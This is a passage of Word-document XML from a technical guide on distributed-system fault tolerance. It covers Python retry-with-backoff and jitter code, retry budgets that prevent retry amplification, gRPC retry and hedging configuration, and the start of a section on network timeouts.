    <w:p w14:paraId="37444869" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                raise  # exhausted retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519AC89F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F6BDB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            # Compute delay based on attempt number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA98034" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            exponential_delay = min(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA84E51" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                base_delay_ms * (backoff_factor ** attempt),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD143FC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                max_delay_ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5329C3C2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0447BF93" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8D1290" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            if jitter == "full":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720E05F0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                delay_ms = random.uniform(0, exponential_delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F06AA0C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            elif jitter == "equal":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB64A86" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                half = exponential_delay / 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3555F16A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                delay_ms = half + random.uniform(0, half)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1B3737" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            elif jitter == "decorrelated":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58220C4D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                delay_ms = random.uniform(base_delay_ms, previous_delay_ms * 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3EBF37" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                delay_ms = min(delay_ms, max_delay_ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A6145" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                previous_delay_ms = delay_ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2680F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            else:  # none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4EF90A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                delay_ms = exponential_delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB4DC8E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417E3164" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            time.sleep(delay_ms / 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2139A245" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B12FBD8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t># Usage example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625471F2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>result = retry_with_backoff(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA44101" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    lambda: payment_service.charge(user_id, amount),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245EB961" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    max_retries=5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA74EF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    base_delay_ms=200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0364E598" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    max_delay_ms=30_000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C8B9DB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    jitter="full"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8EE4E5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EFF2F7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="7B48DC65" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t># Distribution with full jitter (5 retries, base=200ms, factor=2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353C19C2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t># Attempt 1: uniform(0, 200ms)   → avg 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB5061C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t># Attempt 2: uniform(0, 400ms)   → avg 200ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B849D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t># Attempt 3: uniform(0, 800ms)   → avg 400ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF4DB7A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t># Attempt 4: uniform(0, 1600ms)  → avg 800ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48949729" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t># Attempt 5: uniform(0, 3200ms)  → avg 1600ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0777D072" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t># Total expected wait: ~3100ms before final attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A846302" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retry budgets — preventing retry amplification in microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D7030A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9C8321" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Problem: retries in each service layer multiply total requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715F636D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="73762FA6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Service A calls B (3 retries), B calls C (3 retries):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180EF89B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  1 original request to A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11640B2F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  → A retries B up to 3 times = up to 3 requests to B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460DB861" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  → Each B call retries C up to 3 times = up to 9 requests to C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176744D2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC7EF1F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  At 5 layers of retries: amplification = 3^5 = 243×</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D795C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F95BD6D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  C receives 243 requests per user's 1 request at A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E90D3DD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  This can overwhelm C when it's already struggling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451CBA40" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A21F18D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Retry budget:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CB94B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Instead of per-request retry count: global retry budget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9D2A84" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6774F39A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Budget: 10% of requests may be retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB25023" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Monitor: is retry rate &lt; 10% of total traffic?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB9057D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  If yes: retries allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68145DC8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  If no: circuit breaker trips → stop retrying → fail fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705EA588" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A01577A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Token bucket for retry budget:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2085D3F1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Bucket capacity: 100 tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49207853" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Refill rate: 10 tokens/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4F5B2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Each retry: consume 1 token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22429CEF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If empty: no retry (fail immediately)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708B4C9F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B075AC3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    At 1000 req/s: retry budget = 10 tokens/s = 1% retry rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431AD00" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Prevents: retry storm consuming more than 1% additional capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C6C1C1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3403BA0B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Retry budget in gRPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0502EE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Configured via service config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714E0A26" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  "retryPolicy": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E83BA7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    "maxAttempts": 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D456C94" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    "initialBackoff": "0.1s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B634DB9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    "maxBackoff": "1s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA97186" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "backoffMultiplier": 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74E7D0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    "retryableStatusCodes": ["UNAVAILABLE"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EDF0FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4443700E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2EA805" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  gRPC also supports "hedging" (sending retry before first attempt fails):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF0A6FA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  "hedgingPolicy": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D429286" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    "maxAttempts": 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFBE005" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    "hedgingDelay": "0.05s",  // send hedge after 50ms even if first hasn't failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CDE247" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    "nonFatalStatusCodes": ["UNAVAILABLE"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E9C0E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21658BE5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="3E8C5F82">
          <v:rect id="_x0000_i6444" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB49C9E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Timeouts — The Boundary of Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE93DBA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeout Design and the Three-Timeout Rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F1EABA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC6B976" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Why every network call needs a timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5C02E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Without timeout: if downstream hangs, caller hangs forever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A7628" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  → Threads blocked indefinitely → thread pool exhausted → caller fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6543C761" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  → This propagates up the call chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444AED3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F3C5A6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Timeout bounds: maximum time a caller waits for a response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F2217B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  After timeout: caller can take action (retry, fallback, fail fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB6405" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D38E2B8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Three timeout parameters (every network call needs all three):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5E6A96" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="032BC9BF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>1. Connection timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E76247" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   How long to wait to establish a TCP connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B218FB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F754833" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Typical: 1-5 seconds (LAN), 10-30 seconds (WAN)</w:t>
      </w:r>
    </w:p>
